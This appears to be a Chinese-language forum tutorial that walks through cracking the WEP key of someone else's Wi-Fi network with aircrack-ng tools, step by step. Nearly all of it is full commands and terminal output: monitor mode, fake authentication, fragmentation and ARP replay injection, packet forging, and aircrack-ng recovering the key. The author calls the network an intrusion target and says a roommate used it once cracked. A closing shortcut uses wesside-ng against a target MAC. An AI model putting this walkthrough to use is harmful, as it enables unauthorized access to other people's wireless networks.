无线密码破解

发在论坛的帖子见： http://forum.ubuntu.org.cn/viewtopic.php?f=116&t=252764&start=0

1、打开 终端：  输入：ifconfig
   得到以下结果：
   [root@Archlinux ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1A:A0:FF:21:BF 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:17

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

wlan0     Link encap:Ethernet  HWaddr 00:1B:77:D8:63:0C 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:303752 (296.6 Kb)  TX bytes:179166 (174.9 Kb)

2、终端输入： airmon-ng start wlan0
   得到如下结果：
   [root@Archlinux ~]# airmon-ng start wlan0


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
2013    NetworkManager
2017    wpa_supplicant


Interface    Chipset        Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
                (monitor mode enabled on mon0)

3、终端输入：kill 2013 2017   #杀死上面提到的可能造成麻烦的进程<#经测试，可以不杀死进程！>

4、modprobe iwl3945    #上面得到的关于无线的结果

5、打开spoonwep，查到您想破解的无线的 信道 ——>  spoonwep 开启后 会自动跳出一个扫描窗口，里面有标  ch  下面的那个数字就是信道 ，通常是 1 、6、11 ，我扫到的有以下：（只给一个例子，其实扫出来的很多）

BSSID     PWR  Beacons    #Data   ,#/s  CH    MB    ENC  CIPHER  AUTH  ESSID
AP'S MAC    -83  197+        133+    0     6     54e  wep   wep           dlink

BSSID     STATION         PWR       Rate      Lost    Packets    Probes
AP’S MAC      mac         -43       11e-1e      22+-     2000+    dlink

<只是给出例子，数值不一定是这样的，有些一直在变动>


# AP'S MAC  此处我查到的是00:24:01:CO：08:F8 （被破解，入侵目标的MAC地址）
#197+以及133+代表这个数字是一直在增加的##破解之后，我舍友使用这地址时，Data数值增长很快，但
     是之前还未破解时，数值增长很慢，待会儿这个地方也会有变化
#CH下面的6,代表信道
#ENC代表加密方式，此处为wep加密
#AUTH ——>请注意，这个待会儿有所变化（具体我也解释不清，我只是使用者）
#ESSID是这个无线的名称（主人定义的）

6、终端 airmon-ng start mon0 6 
   ···第2中有如下提示  —— (monitor mode enabled on mon0)、6是信道值···
   得到如下结果：
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0


Interface    Chipset        Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
mon0        Intel 3945ABG    iwl3945 - [phy0]
                (monitor mode enabled on mon2)
mon1        Intel 3945ABG    iwl3945 - [phy0]


7、下面开始抓包：（还是在终端执行）
 终端输入 airodump-ng --ivs -w 333 -c 6 mon0

#此处 ivs之前两小杆，看清楚； 
“333” 这个可以任意命名（后面要用到）；
 -c 6 是确定信道为6 mon0是上面开启的，查到的//

注意：这之后您看到和刚才在spoonwep开启的窗口类似的结果。（请不要关闭此窗口）
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                             
                                                                                                                
 00:15:70:D2:0F:84   -1   0        0       34   12 158  -1   OPN              <length:  0>                      
                            
 00:24:01:C0:0B:F8  -78  43     1108     1412   35   6  54e  WEP  WEP         dlink                             
 00:26:5A:AC:BC:D6  -83  20      871        0    0   6  54e  WPA2 CCMP   PSK  405                               
 00:15:70:D2:0F:78  -84   0       92       13    0   6  54   OPN              CMCC                              
 00:1D:0F:7E:01:E4  -84  24      860        0    0   6  54 . WEP  WEP         FR10313                           
 00:25:86:24:1F:86  -86   0        6        0    0   6  54 . WEP  WEP         F10-210                           
 00:0E:E8:DB:33:EB  -87   0      138        0    0  11  54   WPA  TKIP   PSK  ipTIME                            
 00:1B:2F:08:51:E6  -87   0        2        1    0  11  54 . WPA  TKIP   PSK  NETGEAR                           
 00:23:68:09:C9:CC  -85   0       31        7    0   6  54   OPN              CMCC                              
 00:22:B0:91:64:19  -85   0        6        0    0   6  54 . WPA2 CCMP   PSK  Karas                             
 00:27:19:9E:30:F6   -1   0        0        0    0  -1  -1                    <length:  0>                      
                             
                                                                                                                
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                       
                                                                                                                 
 00:15:70:D2:0F:84  00:1B:77:94:AD:04  -87    6 - 1     19      188  CMCC                                        
 (not associated)   00:22:FB:A4:DF:F4  -72    0 - 1      0       55 

8、终端输入：aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0

#此处 -e 后面的是AP‘S ESSID
-a 之后是AP'S BSSID  就是ap的mac地址
-h 之后是自己的mac地址

得到如下结果：

[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
14:48:53  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6

14:48:53  Sending Authentication Request (Open System) [ACK]
14:48:53  Authentication successful
14:48:53  Sending Association Request [ACK]
14:48:53  Association successful :-) (AID: 1)

这时候，刚才未关闭的那个窗口 ，即 airodump-ng 窗口 变化显著（可能）
如很明显，则当data数值增长到10000多的时候可以直接运行下面的命令破解：
_______________________________________________________________________________

[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.


                                 Aircrack-ng 1.0


                 [00:00:04] Tested 1562761 keys (got 1412 IVs)

   KB    depth   byte(vote)
    0   62/ 63   F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
    1   27/  1   FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
    2   22/  2   98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
    3   17/ 40   38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
    4   14/ 40   F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)

Failed. Next try with 5000 IVs.
# 我的没有很快的增长（只有1412），所以这里失败了，下面继续（还是可以破解的：—）心急吃不了热豆腐@！
_________________________________________________________________________________________________________________
9、aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0

[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
15:07:10  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11  mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30  Waiting for a data packet...
Read 2691 packets...

        Size: 328, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:24:01:C0:0B:F8
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:24:01:C0:0B:F8

        0x0000:  0842 0000 0100 5e7f fffa 0024 01c0 0bf8  .B....^...$....
        0x0010:  0024 01c0 0bf8 d066 327e 0200 df2e 869e  .$.....f2~......
        0x0020:  ec2f 54f3 1607 352f b790 45f2 414d 03c2  ./T...5/..E.AM..
        0x0030:  b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4  ...J..........5.
        0x0040:  8911 ad85 e45f ac37 cfff f38b dc41 a600  ....._.7.....A..
        0x0050:  5b21 01cf 9838 d95c d6ef bedc b898 7ec6  [!...8./......~.
        0x0060:  0491 4035 cf43 622d bdfb de72 6964 0299  ..@5.Cb-...rid..
        0x0070:  f2da f200 d5be c5c7 1a59 7e16 d081 078f  .........Y~.....
        0x0080:  8f26 3710 dce0 4cb9 5e32 f043 7108 672a  .&7...L.^2.Cq.g*
        0x0090:  3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d  ?......F.:....-.
        0x00a0:  1fa0 598a a787 36a0 8e5e ead1 abb8 96b1  ..Y...6..^......
        0x00b0:  a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f  ..e%...3..?..|>/
        0x00c0:  9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb  .b.F....`.1-.D..
        0x00d0:  c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928  ..(....H......i(
        --- CUT ---

Use this packet ?

现在选 y   

Use this packet ? y

Saving chosen packet in replay_src-0111-150843.cap
15:09:17  Data packet found!
15:09:17  Sending fragmented packet
15:09:19  No answer, repeating...
15:09:19  Trying a LLC NULL packet
15:09:19  Sending fragmented packet
15:09:20  No answer, repeating...
15:09:20  Sending fragmented packet
15:09:22  No answer, repeating...
15:09:22  Trying a LLC NULL packet
15:09:22  Sending fragmented packet
15:09:23  No answer, repeating...
15:09:23  Sending fragmented packet
15:09:23  Got RELAYED packet!!
15:09:23  Trying to get 384 bytes of a keystream
15:09:23  Got RELAYED packet!!
15:09:23  Trying to get 1500 bytes of a keystream
15:09:23  Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#

看到上面几句关键的话：
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

输入 y 后,系统开始发送数据,airodump-ng 窗口一下就有了反应,Data 数立即增长,就没有必要进行下面的步骤了,等 Data 有 1 万 5 就用aircrack-ng 破出了密码。)

继续看下面的——

10、输入ls 查看刚才的文件名，方便待会儿copy下：—）

[root@Archlinux ~]# ls
333-01.ivs  Desktop    fragment-0111-150923.xor
333-02.ivs  Downloads  replay_src-0111-150843.cap
[root@Archlinux ~]#

 终端输入： packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp

得到：
[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
Wrote packet to: mrarp

11、aireplay-ng -2 –r mrarp -x 1024 mon1
 #此处填写的是 mon1  原因自己看下（aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30  Waiting for a data packet...
Read 2691 packets...这里是mon1哟）

[root@Archlinux ~]# aireplay-ng -2 -r mrarp -x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:77:D8:63:0C)


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:24:01:C0:0B:F8
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1B:77:D8:63:0C

        0x0000:  0841 0201 0024 01c0 0bf8 001b 77d8 630c  .A...$......w.c.
        0x0010:  ffff ffff ffff 8001 437e 0200 769d a167  ........C~..v..g
        0x0020:  e1af 7926 ebca 352f b7cb 1002 53d7 59d3  ..y&..5/....S.Y.
        0x0030:  bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf  .w...2.j...I..*.
        0x0040:  c256 37aa                                .V7.

Use this packet ?
选y
得到：

Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.

此时dump那个窗口data  哗哗的上涨


12、另外再开一个terminal 输入：
ls
得到：
[root@Archlinux ~]# ls
333-01.ivs  Desktop    fragment-0111-150923.xor  replay_src-0111-150843.cap
333-02.ivs  Downloads  mrarp             replay_src-0111-151709.cap
[root@Archlinux ~]#
输入：
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs （之所以是02是因为当时我关闭了一次抓包窗口，所以ls之后有两个ivs）

得到：

[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.


                                 Aircrack-ng 1.0


                 [00:00:04] Tested 1562761 keys (got 1412 IVs)

   KB    depth   byte(vote)
    0   62/ 63   F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
    1   27/  1   FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
    2   22/  2   98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
    3   17/ 40   38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
    4   14/ 40   F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)

Failed. Next try with 5000 IVs.  （错了,是因为当时我关闭了一次airedump-ng 窗口，后来又再次运行那个命令生出另一个ivs）

[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs     #原因如上
Opening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.





                                 Aircrack-ng 1.0


                 [00:00:00] Tested 154 keys (got 17607 IVs)

   KB    depth   byte(vote)
    0    0/  1   15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
    1    3/  8   80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
    2    1/  3   BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
    3    0/  4   12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
    4    0/  2   06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)

                         KEY FOUND! [ 15:80:59:12:06 ]
    Decrypted correctly: 100%


[root@Archlinux ~]#

这里就是密码了。8）


13、看的这里的不容易：
给一个最好的方法：
打开spoonwep客户端，找到要攻击的mac地址以及信道

终端输入如下命令：wesside-ng -i mon0 -v 目标的 MAC

最后 ，为了停止抓包，请输入：

 sudo airmon-ng stop mon0